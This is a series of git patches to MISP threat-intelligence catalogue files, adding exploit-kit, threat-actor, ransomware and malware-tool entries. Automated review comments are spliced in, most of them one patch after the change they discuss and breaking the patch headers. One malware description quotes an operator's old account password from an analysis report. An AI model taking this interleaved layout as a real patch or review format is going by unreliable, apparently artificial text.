From ce94cb845886f97c891074242e2dafe2a95ebc50 Mon Sep 17 00:00:00 2001
From: Kafeine
Date: Sat, 22 Dec 2018 10:19:52 +0100
Subject: [PATCH 01/50] novidade,taurus
---
 clusters/exploit-kit.json | 29 +++++++++++++++++++++++++++--
 1 file changed, 27 insertions(+), 2 deletions(-)
diff --git a/clusters/exploit-kit.json b/clusters/exploit-kit.json
index c6489c3..8c5db5c 100644
--- a/clusters/exploit-kit.json
+++ b/clusters/exploit-kit.json
@@ -97,7 +97,7 @@
 "http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/",
 "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"
 ],
- "status": "Retired - Last seen ",
+ "status": "",
 "synonyms": [
 "Sednit RTF EK"
 ]
@@ -120,6 +120,20 @@
 "uuid": "74fb6a14-1279-4a5b-939a-76478d36d3e1",
 "value": "DNSChanger"
 },
+ {
+ "description": "Novidade Exploit Kit is an exploit kit targeting Routers via the browser",
+ "meta": {
+ "refs": [
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/"
+ ],
+ "status": "Active",
+ "synonyms": [
+ "DNSGhost"
+ ]
+ },
+ "uuid": "88acc3b7-2cdd-4e7b-ad0b-2880ffa1eb6d",
+ "value": "Novidade"
+ },
 {
 "description": "Disdain EK has been introduced on underground forum on 2017-08-07. The panel is stolen from Sundown, the pattern are Terror alike and the obfuscation reminds Nebula",
 "meta": {
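Review bot: The first hunk replaces the Sednit RTF EK status `"Retired - Last seen "` with the empty string `""`, which drops the one meaningful word (retired) and leaves a sentinel that consumers cannot tell apart from "unknown", while still passing any check that only tests for the key's presence. If the last-seen date is not known, keep the category and lose the dangling suffix, `"status": "Retired",`, or remove the key entirely rather than store an empty string. The Novidade entry in the second hunk looks fine as far as the page shows.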
@@ -201,6 +215,17 @@
 "uuid": "b8be7af8-69a8-11e8-adc0-fa7ae01bbebc",
 "value": "VenomKit"
 },
+ {
+ "description": "Taurus Builder is a tool used to generate malicious MS Word documents that contain macros. The kit is advertised on forums by the user \"badbullzvenom\". ",
+ "meta": {
+ "refs": [
+ ""
+ ],
+ "status": "Active"
+ },
+ "uuid": "63988ca2-46c8-4bda-be46-96a8670af357",
+ "value": "Taurus Builder"
+ },
 {
 "description": "RIG is an exploit kit that takes its source in Infinity EK itself an evolution of Redkit. It became dominant after the fall of Angler, Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 when it was only accessible by \"vip\" customers and when RIG 3 was still in use.",
 "meta": {
@@ -751,5 +776,5 @@
 "value": "Unknown"
 }
 ],
- "version": 13
+ "version": 14
 }
From 5766cd68f8edb88f1c1c2e40c42c32defd8c36a0 Mon Sep 17 00:00:00 2001
From: Kafeine
Date: Sat, 22 Dec 2018 11:51:40 +0100
Subject: [PATCH 02/50] zTDS
---
 clusters/tds.json | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)
diff --git a/clusters/tds.json b/clusters/tds.json
index 5865325..5b7658f 100644
--- a/clusters/tds.json
+++ b/clusters/tds.json
@@ -74,6 +74,19 @@
 "uuid": "aa179c37-1a8a-4761-841a-cc940e19d7be",
 "value": "SimpleTDS"
 },
+ {
+ "description": "zTDS is an open source TDS",
+ "meta": {
+ "refs": [
+ "http://ztds.info/doku.php"
+ ],
+ "type": [
+ "OpenSource"
+ ]
+ },
+ "uuid": "7a84de25-545a-4220-b500-85b9219dd67d",
+ "value": "zTDS"
+ },
 {
 "description": "BossTDS",
 "meta": {
@@ -121,5 +134,5 @@
 "value": "Orchid TDS"
 }
 ],
- "version": 3
+ "version": 4
 }
From 272ea3ba4aa648e43535f842c7b13df150209b27 Mon Sep 17 00:00:00 2001
From: Deborah Servili
Date: Thu, 28 Mar 2019 15:58:00 +0100
Subject: [PATCH 03/50] add ref for Ryuk and LockerGoga ransomwares
---
 clusters/ransomware.json | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)
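Review bot: The Taurus Builder entry ships `"refs": [""]`, an array whose only element is an empty string, so anything that walks refs as URLs (link checkers, the galaxy UI) gets a blank link and the claim that the kit is advertised by "badbullzvenom" stays unsourced. Use `"refs": []` or omit the key until a forum post or vendor write-up can be cited, and trim the trailing space inside the description string. Taurus Builder is also a macro-document builder rather than a browser exploit kit; if exploit-kit.json is meant to cover document builders too, that is worth a word in the description, otherwise tool.json looks like the better home.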
diff --git a/clusters/ransomware.json b/clusters/ransomware.json
index 7c124ce..763b695 100644
--- a/clusters/ransomware.json
+++ b/clusters/ransomware.json
@@ -11717,7 +11717,8 @@
 "https://www.crowdstrike.com/blog/wp-content/uploads/2019/01/RansomeNote-fig4.png"
 ],
 "refs": [
- "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
+ "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf"
 ]
 },
 "uuid": "f9464c80-b776-4f37-8682-ffde0cf8f718",
@@ -11745,7 +11746,8 @@
 "https://www.bleepstatic.com/images/news/u/1100723/Ransomware/LockerGoga-ransom-note.png"
 ],
 "refs": [
- "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/"
+ "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf"
 ]
 },
 "uuid": "1e19dae5-80c3-4358-abcd-2bf0ba4c76fe",
@@ -11775,5 +11777,5 @@
 "value": "Jokeroo"
 }
 ],
- "version": 54
+ "version": 55
 }
From 60e4a486a7719c89c1f82dcd17423f2a64c91c78 Mon Sep 17 00:00:00 2001
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Thu, 11 Apr 2019 23:55:51 +0530
Subject: [PATCH 04/50] adding additional resources for APT36
---
 clusters/threat-actor.json | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 2aab5fe..01ecbff 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -6661,6 +6661,8 @@
 "meta": {
 "refs": [
 "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf"
+ "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf"
+ "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf"
 ],
 "synonyms": [
 "APT 36",
From 2fc914b2f94bc4ad3804bd15923b8c04fdf840f1 Mon Sep 17 00:00:00 2001
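Review bot: The two refs added to the APT36 cluster have no separating commas, so after this commit `"…compressed.pdf"` is directly followed by `"https://nciipc…"` and threat-actor.json no longer parses as JSON. Patch 05 in this series puts the commas back, but commit 04 should not land on its own: squash the two, or fix here with `"https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf",` and `"https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf",`. Running the repository's jq validation before committing would have caught this.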
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Fri, 12 Apr 2019 01:06:50 +0530
Subject: [PATCH 05/50] Update threat-actor.json
---
 clusters/threat-actor.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 01ecbff..db3d03b 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -6660,8 +6660,8 @@
 "description": "FireEye details APT36 as a Pakistani espionage group that supports Pakistani military and diplomatic interests, targeting Indian military and government. Operations have been also observed in the US, Europe, and Central Asia. Uses social engineering emails, multiple open-source, and custom malware tools.",
 "meta": {
 "refs": [
- "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf"
- "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf"
+ "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf",
+ "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf",
 "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf"
 ],
 "synonyms": [
From 7987c8f023acbb079a6ffe81a9a3aa8f1b2abf32 Mon Sep 17 00:00:00 2001
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Fri, 12 Apr 2019 01:56:12 +0530
Subject: [PATCH 06/50] Update threat-actor.json
---
 clusters/threat-actor.json | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index db3d03b..e0c5fe8 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -2887,12 +2887,14 @@
 "http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf",
 "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
 "https://www.amnesty.org/en/documents/asa33/8366/2018/en/",
- "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/"
+ "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/",
+ "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe"
 ],
 "synonyms": [
 "C-Major",
 "Transparent Tribe",
- "Mythic Leopard"
+ "Mythic Leopard",
+ "ProjectM"
 ]
 },
 "related": [
From 159225b6cf62a1c6478fd1a970317e21037b5388 Mon Sep 17 00:00:00 2001
From: Daniel Plohmann
Date: Thu, 11 Apr 2019 22:29:49 +0200
Subject: [PATCH 07/50] Based on additional research, APT36 can actually be merged into Mythic Leopard
---
 clusters/threat-actor.json | 28 +++++++++------------------
 1 file changed, 9 insertions(+), 19 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index db3d03b..1d4dd3e 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
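Review bot: The cluster content changes here (a new ref and the synonym `ProjectM`) but the file's top-level `"version"` is left alone, whereas patches 01, 02, 03 and 07 in this series bump it together with their edits. Consumers that refresh a galaxy only when its version increases would presumably not see the new synonym; add the bump (`"version": 107`, or whatever the next number is at merge time) to this commit. The same omission recurs in patches 08, 12 and 13.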
@@ -2887,12 +2887,18 @@
 "http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf",
 "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
 "https://www.amnesty.org/en/documents/asa33/8366/2018/en/",
- "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/"
+ "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/",
+ "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf",
+ "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf",
+ "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf"
 ],
 "synonyms": [
 "C-Major",
 "Transparent Tribe",
- "Mythic Leopard"
+ "Mythic Leopard",
+ "APT36",
+ "APT 36",
+ "TMP.Lapis"
 ]
 },
 "related": [
@@ -6655,23 +6661,7 @@
 },
 "uuid": "401c30c7-4317-458a-9b0a-379a44d63457",
 "value": "Operation ShadowHammer"
- },
- {
- "description": "FireEye details APT36 as a Pakistani espionage group that supports Pakistani military and diplomatic interests, targeting Indian military and government. Operations have been also observed in the US, Europe, and Central Asia. Uses social engineering emails, multiple open-source, and custom malware tools.",
- "meta": {
- "refs": [
- "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf",
- "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf",
- "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf"
- ],
- "synonyms": [
- "APT 36",
- "TMP.Lapis"
- ]
- },
- "uuid": "80fad97c-df3a-44ea-a127-cf29833b4946",
- "value": "APT36"
 }
 ],
- "version": 106
+ "version": 107
 }
From 3256cca9e053ced12ce97113b9eb2618e5efdaf2 Mon Sep 17 00:00:00 2001
From: Bart
Date: Fri, 12 Apr 2019 21:12:16 +0100
Subject: [PATCH 08/50] Add DoNot team references
---
 clusters/threat-actor.json | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
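Review bot: The second hunk deletes the APT36 cluster outright, including its uuid `80fad97c-df3a-44ea-a127-cf29833b4946`; any event or sighting already tagged with that galaxy uuid will dangle after this update, because only the names survive as synonyms of Mythic Leopard. I would keep a stable identifier for the merged entry, for example a `related` entry on Mythic Leopard that points at the old uuid with an explicit relation type, or a minimal deprecated stub, rather than dropping the uuid silently. The merged-away description ("Pakistani espionage group … targeting Indian military and government … US, Europe, and Central Asia") is also lost; fold that sentence into the Mythic Leopard description, which sits outside this hunk. Note that this patch is based on db3d03b, so it will conflict with patch 06's `ProjectM`/unit42 additions on the same lines.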
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index a9c864d..2be228e 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -5764,7 +5764,9 @@
 "description": "In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT's attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization",
 "meta": {
 "refs": [
- "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/"
+ "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
+ "https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia",
+ "https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/"
 ],
 "synonyms": [
 "DoNot Team"
From d98aefa18640094c269421de2b3b0f5ae7ad4ea2 Mon Sep 17 00:00:00 2001
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Wed, 17 Apr 2019 09:17:23 +0530
Subject: [PATCH 09/50] fixed the broken link
---
 clusters/threat-actor.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 2be228e..8ec4896 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -757,7 +757,7 @@
 "country": "CN",
 "refs": [
 "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html",
+ "https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html",
 "https://www.cfr.org/interactive/cyber-operations/apt-30"
 ],
 "synonyms": [
From e1cab6868399970a986246b7ee6d20931e6a2947 Mon Sep 17 00:00:00 2001
From: Bart
Date: Wed, 17 Apr 2019 12:27:18 +0100
Subject: [PATCH 10/50] Add Whitefly
---
 clusters/threat-actor.json | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 2be228e..280d277 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -6665,7 +6665,17 @@
 },
 "uuid": "401c30c7-4317-458a-9b0a-379a44d63457",
 "value": "Operation ShadowHammer"
- }
+ },
+ {
+ "description": "In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.",
+ "meta": {
+ "refs": [
+ "https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore"
+ ]
+ },
+ "uuid": "943f490e-ac7f-40fe-b6f3-33e2623649d2",
+ "value": "Whitefly"
+ }
 ],
 "version": 107
 }
From ecc63cf1665c49705dac2644800f0122d06b5b1d Mon Sep 17 00:00:00 2001
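Review bot: The Whitefly description is the Symantec post's opening paragraph verbatim, including the first-person "which we call Whitefly" and "Until now, nothing was known", which reads wrongly outside its source and goes stale as soon as other reporting exists. Rewrite it in third person around the actor, e.g. `"description": "Whitefly is the name given by Symantec to the group behind the July 2018 SingHealth breach in Singapore (a reported 1.5 million patient records stolen). Active since at least 2017, it targets organizations based mostly in Singapore across a wide variety of sectors and is primarily interested in stealing large amounts of sensitive information.",`. The file version is not bumped in this commit either; patch 11 adds it.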
From: Christophe Vandeplas
Date: Wed, 17 Apr 2019 21:01:55 +0200
Subject: [PATCH 11/50] chg; [threat-actor] validate + version bump
---
 clusters/threat-actor.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index dfaf051..c84e46d 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -6675,7 +6675,7 @@
 },
 "uuid": "943f490e-ac7f-40fe-b6f3-33e2623649d2",
 "value": "Whitefly"
- }
+ }
 ],
- "version": 107
+ "version": 108
 }
From 8ac7aec85cfef89c5073faba2038e3ea37edd1d9 Mon Sep 17 00:00:00 2001
From: Deborah Servili
Date: Fri, 19 Apr 2019 13:21:11 +0200
Subject: [PATCH 12/50] add Sea Turtle campaign
---
 clusters/threat-actor.json | 10 ++++++++++
 1 file changed, 10 insertions(+)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index c84e46d..d7aa608 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -6675,6 +6675,16 @@
 },
 "uuid": "943f490e-ac7f-40fe-b6f3-33e2623649d2",
 "value": "Whitefly"
+ },
+ {
+ "description": " This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.",
+ "meta": {
+ "refs": [
+ "https://blog.talosintelligence.com/2019/04/seaturtle.html"
+ ]
+ },
+ "uuid": "ce7bba52-5ae8-44ea-9979-68502d832ab7",
+ "value": "Sea Turtle"
 }
 ],
 "version": 108
From 292df2360a10dca63dd427bae6250802d0a6dbd8 Mon Sep 17 00:00:00 2001
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Mon, 22 Apr 2019 11:05:21 +0530
Subject: [PATCH 13/50] more report on APT36
---
 clusters/threat-actor.json | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index d7aa608..24c73ed 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
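Review bot: The Sea Turtle description starts with a stray space and is the blog's editorial paragraph ("This blog post discusses …", "Responsible nations should avoid targeting this system …") rather than a description of the campaign, so the only facts the cluster carries are "state-sponsored", "manipulating DNS systems" and "targeting primarily national security organizations in the Middle East and North Africa". Replace it with a neutral summary limited to what the reference establishes, e.g. `"description": "Sea Turtle is the name Cisco Talos gave to a state-sponsored campaign, reported in April 2019, that manipulated DNS to target primarily national security organizations in the Middle East and North Africa.",`, and leave the normative text to the linked post. The commit message calls this a campaign, yet it lands in threat-actor.json with no synonym or `related` link to an actor; say in the description that it is a campaign name, or link it. `"version"` stays at 108 although the cluster content changed.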
@@ -2891,7 +2891,9 @@
 "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe",
 "https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf",
 "https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf",
- "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf"
+ "https://aisa.org.au//PDF/AISA%20Sydney%20-%20Dec2016.pdf",
+ "https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials",
+ "https://s.tencent.com/research/report/669.html"
 ],
 "synonyms": [
 "C-Major",
From 088e7477a627fdea40b905bd050ec80b28445232 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Wed, 24 Apr 2019 11:40:06 +0200
Subject: [PATCH 14/50] chg: [tool] Karkoff tool added
---
 clusters/tool.json | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/clusters/tool.json b/clusters/tool.json
index 17a5a7c..f2df2d8 100644
--- a/clusters/tool.json
+++ b/clusters/tool.json
@@ -7630,7 +7630,17 @@
 },
 "uuid": "e1ca79ea-5628-4266-bb36-3892c7126ef4",
 "value": "Brushaloader"
+ },
+ {
+ "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908",
+ "value": "Karkoff",
+ "meta": {
+ "refs": [
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+ ]
+ },
+ "description": "In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff."
 }
 ],
- "version": 116
+ "version": 117
 }
From 094f0e0684efa8857944aed6e70a29b33b5065d8 Mon Sep 17 00:00:00 2001
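Review bot: The Karkoff description is a first-person excerpt from the Talos post about the DNSpionage actors' TTP changes and says nothing about Karkoff itself beyond "a new malware, which we are calling Karkoff", so a reader of tool.json learns neither what it is nor who deploys it. Rewrite it in third person around the tool, keeping only what the reference supports, e.g. `"description": "Karkoff is malware first reported by Cisco Talos in April 2019 and attributed to the actors behind the DNSpionage campaign, who deploy it after a reconnaissance phase that selectively chooses which targets to infect.",`; the DNSpionage link could additionally go in a `related` entry. The key order (uuid, value, meta, description) also departs from the rest of the file; patch 15 reorders it, so squash the two or run jq before committing.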
From: Alexandre Dulaunoy
Date: Wed, 24 Apr 2019 12:58:49 +0200
Subject: [PATCH 15/50] chg: [tool] jq all the things
---
 clusters/tool.json | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/clusters/tool.json b/clusters/tool.json
index f2df2d8..77d4645 100644
--- a/clusters/tool.json
+++ b/clusters/tool.json
@@ -7632,14 +7632,14 @@
 "value": "Brushaloader"
 },
 {
- "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908",
- "value": "Karkoff",
+ "description": "In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff.",
 "meta": {
 "refs": [
 "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
 ]
 },
- "description": "In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff."
+ "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908",
+ "value": "Karkoff"
 }
 ],
 "version": 117
From 2405f1c59e1717659a9f62a262d015f463c690e2 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Sat, 27 Apr 2019 09:33:55 +0200
Subject: [PATCH 16/50] chg: [tool] Cowboy and KimJongRAT (Sorry Paul, we forgot ;-)
ref: https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
---
 clusters/tool.json | 22 +++++++++++++++++++++-
 1 file changed, 21 insertions(+), 1 deletion(-)
diff --git a/clusters/tool.json b/clusters/tool.json
index 77d4645..8493546 100644
--- a/clusters/tool.json
+++ b/clusters/tool.json
@@ -7640,7 +7640,27 @@
 },
 "uuid": "a9fc6d3d-09d5-45c3-a91e-e8c61ef37908",
 "value": "Karkoff"
+ },
+ {
+ "description": "We conclude that this RAT/stealeris efficient and was also really interesting to analyse.Furthermore, the creator made effortsto look Korean, for example the author of the .pdf file is Kim Song Chol. He is the brother of Kim Jong-un, the leader of North Korea. We identified that the author of a variant of this stealer is another brother of Kim Jong-un. Maybe the author named every variant withthe name of each brother. After some searches using Google, we identified anold variant of this malware here: http://contagiodump.blogspot.ca/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html. The code of the malware available on the blog is closeto our case but with fewer features. In 2010, the password of the Gmail account was futurekimkim. Three years ago, the author was already fixatedon the Kim family...The language of the resource stored in the .dll file is Korean (LANG_KOREAN). The owner of the gmail mailbox is laoshi135.zhangand the secret question of this account is in Korean too.We don’t know if the malware truly comesfrom Korea.However, thanks to these factors, we decided to name this sample KimJongRAT/Stealer.",
+ "meta": {
+ "refs": [
+ "https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf"
+ ]
+ },
+ "uuid": "3160f772-d458-4bff-970c-1c0431238803",
+ "value": "KimJongRAT"
+ },
+ {
+ "description": "Based on our research, it appears the malware author calls the encoded secondary payload “Cowboy” regardless of what malware family is delivered.",
+ "meta": {
+ "refs": [
+ "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
+ ]
+ },
+ "uuid": "50baa4dc-0667-4b47-b4aa-374a2743f409",
+ "value": "Cowboy"
 }
 ],
- "version": 117
+ "version": 118
 }
From 915b673b7af17037489f0879ee1e794fad2094fc Mon Sep 17 00:00:00 2001
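Review bot: The KimJongRAT description was lifted from the malware.lu PDF and carries extraction artefacts — missing spaces in `stealeris`, `effortsto`, `withthe`, `anold`, `closeto`, `fixatedon`, `comesfrom`, `zhangand`, and sentences run together after full stops — and most of it is the analysts' reasoning about the name (including the operator's Gmail password) rather than a description of the tool. Fix the spacing at minimum, and preferably cut it to what the reference establishes: a RAT/stealer whose decoy PDF is authored as "Kim Song Chol", whose DLL resource language is Korean (LANG_KOREAN), which exfiltrates through a Gmail mailbox, and which has a 2010 variant with fewer features; move the bare `http://contagiodump.blogspot.ca/…` link out of the prose and into `refs`. The unit42 post cited in the commit message is the reason this entry exists, but it is only attached to Cowboy, so add it to KimJongRAT's `refs` too. Cowboy, per its own description, is the author's label for an encoded secondary payload shared across families rather than a malware family; a clause saying so would stop it being read as one.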
From: Kafeine
Date: Sun, 28 Apr 2019 12:24:48 +0200
Subject: [PATCH 17/50] += Spelevo
---
 clusters/exploit-kit.json | 11 +++++++++++
 1 file changed, 11 insertions(+)
diff --git a/clusters/exploit-kit.json b/clusters/exploit-kit.json
index 8c5db5c..a2b249f 100644
--- a/clusters/exploit-kit.json
+++ b/clusters/exploit-kit.json
@@ -245,6 +245,17 @@
 },
 "uuid": "0545e5c0-ed0d-4a02-a69d-31e9e2b31e8a",
 "value": "RIG"
+ },
+ {
+ "description": "Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK",
+ "meta": {
+ "refs": [
+ "https://twitter.com/kafeine/status/1103649040800145409"
+ ],
+ "status": "Active"
+ },
+ "uuid": "c880991f-1c17-4bf2-8955-50309364e358",
+ "value": "Spelevo"
 },
 {
 "description": "Sednit EK is the exploit kit used by APT28",
From f9a030ce54716952caffcbd23ae0be1244faaac7 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Sun, 28 Apr 2019 19:12:06 +0200
Subject: [PATCH 18/50] chg: [exploit-kit] jq all the things
---
 clusters/exploit-kit.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/clusters/exploit-kit.json b/clusters/exploit-kit.json
index a744fd1..197d7bb 100644
--- a/clusters/exploit-kit.json
+++ b/clusters/exploit-kit.json
@@ -246,7 +246,7 @@
 "uuid": "0545e5c0-ed0d-4a02-a69d-31e9e2b31e8a",
 "value": "RIG"
 },
- {
+ {
 "description": "Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK",
 "meta": {
 "refs": [
From 57735a5b5c2c6511d7e8eaa791022d2fe13171dd Mon Sep 17 00:00:00 2001
From: Rintaro KOIKE
Date: Tue, 30 Apr 2019 20:41:12 +0900
Subject: [PATCH 19/50] chg: [malpedia] updated to the latest version
Ref: https://malpedia.caad.fkie.fraunhofer.de/api/get/misp
---
 clusters/malpedia.json | 2789 ++++++++++++++++++++++++++++++++++++----
 1 file changed, 2518 insertions(+), 271 deletions(-)
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 0ede545..28bd70b 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -15,6 +15,21 @@
 "type": "malpedia",
 "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e",
 "values": [
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash",
